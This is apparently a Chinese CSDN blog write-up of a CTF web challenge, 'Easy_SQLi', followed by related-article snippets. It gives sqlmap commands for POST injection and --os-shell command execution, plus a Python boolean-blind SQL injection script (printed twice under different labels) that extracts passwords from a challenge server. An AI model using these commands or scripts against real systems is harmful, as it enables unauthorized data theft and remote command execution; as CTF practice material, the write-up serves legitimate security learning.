5、sqlmap注入post类型+os-shell

于 2024-05-21 20:29:55 发布
阅读量385 收藏 4
点赞数 9
分类专栏: CTF web类 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51520483/article/details/139100820
版权

题目:青少年:Easy_SQLi

1、打开网页,是一个登入表单

2、判断注入类型,是一个字符注入,使用or直接绕过密码进去了

3、上bp抓取数据包,sqlmmap用post注入走一遍,找到数据库,账号密码,这里的账号密码其实也没什么用,形同虚设

sqlmap注入payload:

python sqlmap.py -r "C:\Users\bixin\Desktop\dictionary\post.txt" -p uname --dbs

-r:表示指定注入的post文件路径

-p:表示注入点参数,uname

--dbs:当前服务器中的所以数据库

4、老规矩,数据表、字段挨个走一遍,但没有什么发现

5、试一下shell注入,一试一个准,直接进去了,查看一下根目录发现flag

D:\Python3.8.6\SQLmap>python sqlmap.py -r "C:\Users\bixin\Desktop\dictionary\post.txt" -p uname --os-shell

-r

-r:表示目标为一个文件,bp抓的包

-p:表示一个参数,即一个注入的口

-os-shell:进行shell注入

6、成功进入shell,查看根目录文件,发现flag

7、成功获取flag

补充:

在网上看到另外一种wp

使用的是脚本跑,没看懂,留着以后看,如下:

①:这个脚本速度快

import requests
import time
url = "http://challenge.qsnctf.com:31029/login.php"  #这里放的是url,登入状态的url
flag = ""
for num in range(1,100):
    for i in range(33,127) :
        data = {'uname':"' or 1=1 and  ascii(substr((select group_concat(password) from information_schema.columns where table_schema=database()),{0},1))={1}#".format(num,i),'psw':'1'}
        res = requests.post(url = url, data = data)
        time.sleep(0.05)
        if res.text == "Login successful" :
            flag += chr(i)
            break
print(flag)

②这个脚本速度慢

import requests
import time
url = "http://challenge.qsnctf.com:31029/login.php"  #这里放的是url,登入状态的url
flag = ""
for num in range(1,100):
    for i in range(33,127) :
        data = {'uname':"' or 1=1 and  ascii(substr((select group_concat(password) from information_schema.columns where table_schema=database()),{0},1))={1}#".format(num,i),'psw':'1'}
        res = requests.post(url = url, data = data)
        time.sleep(0.05)
        if res.text == "Login successful" :
            flag += chr(i)
            break
print(flag)

总结:

1、先测试是否存在sql注入,有无回显

2、出现登入表单,第一时间采用post注入

3、发现数据库没有机会的情况,换os-shell注入

你挡我发光了
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
post方法sqlmap注入
weixin_44232532的博客
02-20 412
利用sqlmap进行POST注入 </div> 利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs注:-r表示加载一个文...
sql学习3(sqlmap的使用)
cyy001128的博客
04-03 672
接上一篇学习2。
sqlmap 如何 --os-shell 及反弹shell_sqlmap跑shell(3)
最新发布
2401_84281594的博客
05-17 1037
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。lport=4444:指定本地主机的端口号,也就是反向连接的目标主机的监听端口号。
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2952
使用sqlmap进行post注入学习笔记
Sqlmap -- POST注入
weixin_41489908的博客
07-07 2820
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
sqlmappost注入
墨渊的博客
09-29 184
调为low级 点击cope to file 把数据数据请求保存到txt -r 使用文件要先使用文件的路径 -r表示加载一个文件 --batch 表示自动输入参数 --dbs表示数据库 sqlmap -r 22.txt --batch --dbs -D 表示选择数据库 --tables表示数据库 sqlmap -r 22.txt --batch -D dvwa --tables -D -T 指定数据库查看的表 ----columns查看表的字段 –dump进行解密 ...
sqlmap post注入
zhaozhanyong的专栏
11-19 5900
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u ..../sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
sqlmap注入说明
03-08
### SQLMap注入说明 SQLMap是一款强大的开源渗透测试工具,用于自动化检测和利用SQL注入漏洞。它能够通过网络与目标数据库交互,发现并利用数据库管理系统的安全漏洞,从而获取敏感数据或控制受影响的数据库服务器...
sqlmap-master
06-23
2. **数据库指纹识别**:一旦发现注入SQLMap会尝试识别后端数据库管理系统(如MySQL、PostgreSQL、Oracle等)的类型和版本,这有助于选择最佳的攻击策略。 3. **数据提取**:利用SQL注入SQLMap能获取数据库中的...
SQLMAP使用笔记.pdf
01-25
SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP 的使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` ...
sqlmap的使用.docx
06-28
除了基础的注入操作,Sqlmap还可以执行更高级的功能,如`--os-shell`获取远程主机的命令行shell,`--os-cmd="whoami"`执行远程主机的命令,`--is-dba`检查DBMS用户是否具有管理员权限。 此外,Sqlmap还提供了`--g`...
sqlmap---post----注入
cc1988429的专栏
10-14 1308
sqlmap---post----注入 先抓包 http://zzzzz.com/xx/xx_list.asp?action=list bm=%C6%BD%C3%E6%B2=sss&xx=sss ------------------------------------------------------------------------------------------
sqlmapPOST注入
热门推荐
MyBack
06-03 3万+
第一种方式, 就是让sqlmap去自动获取表单: sqlmap -u "http://www.xxxxxxxx.gov.cn/bxcxnew1.aspx" --forms 一般情况下就一直按回车就好了。 第二种, 爪好POST包后存在一个文件中, 再用 -r 参数读取, 这种方式的好处是不易出错, 当一个页面有多个表单时, 能正确指引。 把以上内存复制保
sqlmappost使用方法
sinat_41380394的博客
08-21 2764
http://120.24.86.145:8002/chengjidan/index.php 注入通过post提交id查询。 1.使用burpSuite拦截post包,复制下数据包为a.txt 2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有 例如 sqlmap -r a.txt -p username --batch --dum...
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 1004
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4672
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmap (--os-shell)的使用
07-28
sqlmap是一款用于自动化SQL注入和数据库接管的工具。使用--os-shell参数可以在受攻击的目标上执行操作系统命令。首先,用户需要具备dba权限才能使用--os-shell参数\[1\]。然后,可以通过以下命令来攻击目标并获取操作系统shell: ``` sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os-shell ``` 在使用--os-shell参数之前,需要确保Mysql数据库的secure_file_priv参数允许导入导出操作\[2\]。如果secure_file_priv参数的值为null,表示不允许导入导出操作,需要管理员修改该参数的值。在Mysql 5.7版本以上,默认情况下secure_file_priv参数的值为null,因此需要管理员修改该参数的值才能使用--os-shell参数\[2\]。 使用--os-shell参数的原理是通过使用into outfile函数上传两个php文件,一个用于上传文件,另一个用于执行系统命令并返回结果\[3\]。这样就可以在目标系统上执行操作系统命令。 请注意,使用sqlmap进行攻击是非法的,仅用于安全测试和研究目的。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap —— os-shell参数分析](https://blog.csdn.net/qq_43531669/article/details/120630864)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值